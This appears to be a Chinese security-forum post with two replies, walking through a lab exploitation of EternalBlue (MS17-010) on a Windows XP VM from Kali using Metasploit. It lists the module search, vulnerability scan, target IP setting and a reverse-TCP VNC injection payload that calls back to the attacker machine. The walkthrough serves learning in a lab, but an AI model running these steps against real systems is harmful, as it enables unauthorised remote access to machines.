首页
社区
课程
招聘
[原创]32位xp系统 永恒之蓝漏洞利用
发表于: 2022-1-27 17:59 9636

[原创]32位xp系统 永恒之蓝漏洞利用

2022-1-27 17:59
9636

攻击机:kali 2020.4 靶机:windows xp32位
进入kali终端后,输入msfconsole,调出MSF渗透工具

输入search Ms17_010,查找永恒之蓝漏洞利用模块

按回车运行

查看靶机ip地址

先调用嗅探模块,查看靶机是否有永恒之蓝漏洞,输入use 3

输入set RHOST 192.168.48.129,告诉kali要攻击的目标ip

输入exploit,开始嗅探

出现如下界面,说明靶机有永恒之蓝漏洞

接着,开始攻击,输入use 1调用攻击模块

输入set payload payload/windows/vncinject/reverse_tcp,设置攻击载荷

打开一个新的终端,输入ip add查看kali的ip地址

回车运行后,出现如下界面,kali的ip地址为192.168.48.134

输入set RHOST 192.168.48.129,告诉kali攻击目标
并输入set IHOST 192.168.48.134,由于是回弹机制,告诉kali把从靶机取得的信息返回到这个ip地址,就是kali

输入exploit,并按回车,弹出一个窗口,如下图所示,我们已经可以远程查看靶机的屏幕

最后验证一下,在靶机命令提示符中输入net user

kali窗口上也出现了此画面

渗透到此结束


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2022-1-27 20:22 被hackerbob编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (2)
雪    币: 676
活跃值: (322)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2

过去几个月了,我学了逆向和编程,我突然发现我写的这篇文章是真的烂,这么简单,小儿科的东西也往论坛上发,不过算是给刚入门渗透的同学做个参考吧

最后于 2022-5-1 21:45 被hackerbob编辑 ,原因: 文章太烂
2022-1-27 20:13
0
雪    币: 1002
活跃值: (1304)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
这个年代久远了,相信大伙都不会陌生的
2022-1-28 00:20
0
游客
登录 | 注册 方可回帖
返回
//